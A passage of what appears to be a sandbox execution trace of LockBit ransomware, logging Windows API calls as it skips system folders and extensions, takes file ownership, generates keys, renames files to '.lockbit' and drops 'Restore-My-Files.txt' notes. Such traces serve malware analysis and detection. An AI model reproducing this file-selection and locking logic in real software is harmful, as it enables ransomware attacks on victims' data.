lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".cmd", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".exe", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".ani", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".adv", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".theme", lpString2=".ini") returned 1 [0076.640] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0076.640] lstrcmpiW (lpString1=".msp", lpString2=".ini") returned 1 [0076.640] lstrcmpiW (lpString1=".com", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".diagpkg", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".nls", lpString2=".ini") returned 1 [0076.640] lstrcmpiW (lpString1=".diagcab", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".lock", lpString2=".ini") returned 1 [0076.640] lstrcmpiW (lpString1=".ocx", lpString2=".ini") returned 1 [0076.640] lstrcmpiW (lpString1=".mpa", lpString2=".ini") returned 1 [0076.640] lstrcmpiW (lpString1=".cpl", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".mod", lpString2=".ini") returned 1 [0076.640] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0076.640] lstrcmpiW (lpString1=".icns", lpString2=".ini") returned -1 [0076.641] lstrcmpiW (lpString1=".prf", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".rtp", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".diagcfg", lpString2=".ini") returned -1 [0076.641] lstrcmpiW (lpString1=".msstyles", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0076.641] lstrcmpiW (lpString1=".hlp", lpString2=".ini") returned -1 [0076.641] lstrcmpiW (lpString1=".shs", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".drv", lpString2=".ini") returned -1 [0076.641] lstrcmpiW (lpString1=".wpx", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".bat", lpString2=".ini") returned -1 [0076.641] lstrcmpiW (lpString1=".rom", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".msc", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".spl", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".ps1", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".msu", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0076.641] lstrcmpiW (lpString1=".key", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".reg", lpString2=".ini") returned 1 [0076.641] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0076.641] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0076.641] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0076.641] lstrcmpiW (lpString1=".", lpString2="DVD Maker") returned -1 [0076.641] lstrcmpiW (lpString1="..", lpString2="DVD Maker") returned -1 [0076.641] lstrcmpiW (lpString1="DVD Maker", lpString2="$windows.~bt") returned 1 [0076.641] lstrcmpiW (lpString1="DVD Maker", lpString2="intel") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="msocache") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="$recycle.bin") returned 1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="$windows.~ws") returned 1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="tor browser") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="boot") returned 1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="system volume information") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="perflogs") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="google") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="application data") returned 1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="windows") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="windows.old") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="appdata") returned 1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="Windows nt") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="Msbuild") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="Microsoft") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="All users") returned 1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="mozilla") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="Microsoft.NET") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="microsoft shared") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="Internet Explorer") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="common files") returned 1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="opera") returned -1 [0076.642] lstrcmpiW (lpString1="DVD Maker", lpString2="Windows Journal") returned -1 [0076.642] wsprintfW (in: param_1=0x3d6dda0, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker") returned 27 [0076.642] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\*") returned 29 [0076.642] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6d598, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6d598) returned 0x55fdb8 [0076.643] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.643] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.643] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.643] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.643] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ed7565, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0ed7565, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0efd6c5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="audiodepthconverter.ax", cAlternateFileName="")) returned 1 [0076.643] lstrcmpiW (lpString1=".", lpString2="audiodepthconverter.ax") returned -1 [0076.643] lstrcmpiW (lpString1="..", lpString2="audiodepthconverter.ax") returned -1 [0076.643] PathFindExtensionW (pszPath="audiodepthconverter.ax") returned=".ax" [0076.643] lstrcmpiW (lpString1=".386", lpString2=".ax") returned -1 [0076.643] lstrcmpiW (lpString1=".cmd", lpString2=".ax") returned 1 [0076.643] lstrcmpiW (lpString1=".exe", lpString2=".ax") returned 1 [0076.643] lstrcmpiW (lpString1=".ani", lpString2=".ax") returned -1 [0076.643] lstrcmpiW (lpString1=".adv", lpString2=".ax") returned -1 [0076.643] lstrcmpiW (lpString1=".theme", lpString2=".ax") returned 1 [0076.643] lstrcmpiW (lpString1=".msi", lpString2=".ax") returned 1 [0076.643] lstrcmpiW (lpString1=".msp", lpString2=".ax") returned 1 [0076.643] lstrcmpiW (lpString1=".com", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".diagpkg", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".nls", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".diagcab", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".lock", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".ocx", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".mpa", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".cpl", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".mod", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".hta", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".icns", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".prf", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".rtp", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".diagcfg", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".msstyles", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".bin", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".shs", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".drv", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".wpx", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".bat", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".rom", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".msc", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".spl", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".ps1", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".msu", lpString2=".ax") returned 1 [0076.644] lstrcmpiW (lpString1=".ics", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".key", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".mp3", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".reg", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".dll", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".ini", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".idx", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".sys", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".ico", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".lnk", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".rdp", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".lockbit", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="audiodepthconverter.ax") returned 1 [0076.645] lstrcmpiW (lpString1="ntldr", lpString2="audiodepthconverter.ax") returned 1 [0076.645] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="audiodepthconverter.ax") returned 1 [0076.645] lstrcmpiW (lpString1="bootsect.bak", lpString2="audiodepthconverter.ax") returned 1 [0076.645] lstrcmpiW (lpString1="autorun.inf", lpString2="audiodepthconverter.ax") returned 1 [0076.645] lstrcmpiW (lpString1="thumbs.db", lpString2="audiodepthconverter.ax") returned 1 [0076.645] lstrcmpiW (lpString1="iconcache.db", lpString2="audiodepthconverter.ax") returned 1 [0076.645] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.645] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\audiodepthconverter.ax") returned=".ax" [0076.645] lstrcmpiW (lpString1=".rar", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".zip", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".7z", lpString2=".ax") returned -1 [0076.645] lstrcmpiW (lpString1=".ckp", lpString2=".ax") returned 1 [0076.645] lstrcmpiW (lpString1=".dacpac", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".db", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".db-shm", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".db-wal", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".db3", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".dbf", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".dbc", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".dbs", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".dbt", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".dbv", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".frm", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".mdf", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".mrg", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".mwb", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".myd", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".ndf", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".qry", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".sdb", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".sdf", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".sql", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".sqlite", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".sqlite3", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ax") returned 1 [0076.646] lstrcmpiW (lpString1=".tmd", lpString2=".ax") returned 1 [0076.646] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\audiodepthconverter.ax.lockbit") returned 58 [0076.646] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.648] GetModuleHandleA (lpModuleName="ntdll") returned 0x77c40000 [0076.648] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.649] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.649] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.649] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.649] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.649] RtlFreeAnsiString (AnsiString="\\") [0076.649] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x16c) returned 0x0 [0076.649] malloc (_Size=0x200) returned 0x77d800 [0076.649] NtQueryInformationToken (in: TokenHandle=0x16c, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.650] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.650] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.650] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\audiodepthconverter.ax", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.650] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\audiodepthconverter.ax", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.651] CloseHandle (hObject=0x16c) returned 1 [0076.651] free (_Block=0x77d800) [0076.651] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\audiodepthconverter.ax" (normalized: "c:\\program files\\dvd maker\\audiodepthconverter.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x16c [0076.651] CreateIoCompletionPort (FileHandle=0x16c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.651] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.652] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=50688) returned 1 [0076.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.654] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.673] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\audiodepthconverter.ax.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.673] malloc (_Size=0x8a) returned 0x77d800 [0076.673] NtSetInformationFile (FileHandle=0x16c, IoStatusBlock=0x3d6cf04, FileInformation=0x77d800, Length=0x8a, FileInformationClass=0xa) returned 0x0 [0076.676] free (_Block=0x77d800) [0076.676] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\audiodepthconverter.ax" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.676] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.676] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x16c [0076.677] CreateIoCompletionPort (FileHandle=0x16c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.677] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.677] WriteFile (in: hFile=0x16c, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0076.685] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x499cc441, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x499cc441, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1303c, dwReserved0=0x0, dwReserved1=0x0, cFileName="bod_r.TTF", cAlternateFileName="")) returned 1 [0076.685] lstrcmpiW (lpString1=".", lpString2="bod_r.TTF") returned -1 [0076.685] lstrcmpiW (lpString1="..", lpString2="bod_r.TTF") returned -1 [0076.685] PathFindExtensionW (pszPath="bod_r.TTF") returned=".TTF" [0076.685] lstrcmpiW (lpString1=".386", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".cmd", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".exe", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".ani", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".adv", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".theme", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".msi", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".msp", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".com", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".diagpkg", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".nls", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".diagcab", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".lock", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".ocx", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".mpa", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".cpl", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".mod", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".hta", lpString2=".TTF") returned -1 [0076.685] lstrcmpiW (lpString1=".icns", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".prf", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".rtp", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".diagcfg", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".msstyles", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".bin", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".hlp", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".shs", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".drv", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".wpx", lpString2=".TTF") returned 1 [0076.686] lstrcmpiW (lpString1=".bat", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".rom", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".msc", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".spl", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".ps1", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".msu", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".ics", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".key", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".mp3", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".reg", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".dll", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".ini", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".idx", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".sys", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".hlp", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".ico", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".lnk", lpString2=".TTF") returned -1 [0076.686] lstrcmpiW (lpString1=".rdp", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".lockbit", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="bod_r.TTF") returned 1 [0076.687] lstrcmpiW (lpString1="ntldr", lpString2="bod_r.TTF") returned 1 [0076.687] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="bod_r.TTF") returned 1 [0076.687] lstrcmpiW (lpString1="bootsect.bak", lpString2="bod_r.TTF") returned 1 [0076.687] lstrcmpiW (lpString1="autorun.inf", lpString2="bod_r.TTF") returned -1 [0076.687] lstrcmpiW (lpString1="thumbs.db", lpString2="bod_r.TTF") returned 1 [0076.687] lstrcmpiW (lpString1="iconcache.db", lpString2="bod_r.TTF") returned 1 [0076.687] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.687] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\bod_r.TTF") returned=".TTF" [0076.687] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0076.687] lstrcmpiW (lpString1=".7z", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".ckp", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".dacpac", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".db", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".db-shm", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".db-wal", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".db3", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".dbc", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".dbs", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".dbt", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".dbv", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".frm", lpString2=".TTF") returned -1 [0076.687] lstrcmpiW (lpString1=".mdf", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".mrg", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".mwb", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".myd", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".ndf", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".qry", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".sdb", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".sdf", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".sql", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".sqlite", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".sqlite3", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".sqlitedb", lpString2=".TTF") returned -1 [0076.688] lstrcmpiW (lpString1=".tmd", lpString2=".TTF") returned -1 [0076.688] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\bod_r.TTF.lockbit") returned 45 [0076.688] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.690] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.690] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.690] RtlDosPathNameToNtPathName_U_WithStatus () returned 